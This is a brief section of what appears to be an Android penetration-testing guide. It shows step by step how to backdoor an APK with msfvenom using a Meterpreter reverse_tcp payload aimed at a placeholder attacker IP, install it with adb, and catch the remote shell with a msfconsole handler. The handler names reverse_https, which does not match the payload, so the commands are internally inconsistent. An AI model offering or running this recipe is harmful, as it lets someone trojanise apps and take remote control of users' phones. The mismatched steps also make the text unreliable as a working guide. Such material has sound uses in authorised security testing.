4.2 Quick Proof-of-Concept (Meterpreter)

This guide revealed to me a functionality which I was not aware of - msfvenom does everything for you!

Works as well for Xamarin-Apps.

Create backdoored apk

msfvenom -x /path/to/target_app.apk -p android/meterpreter/reverse_tcp LHOSt=<ATTACKER-IP> LPORT=<ATTACKER-PORT> -o target_modified.apk

Output: Saved as: target_modified.apk

Install application

adb install target_modified.apk

Start meterpreter session handler

(use same IP & port as you used to generate the payload above):

msfconsole
use multi/handler
set payload android/meterpreter/reverse_https
set LHOST <ATTACKER-IP>
set LPORT <ATTACKER-PORT>
run

START APPLICATION ON DEVICE AND HAVE FUN!!! ;)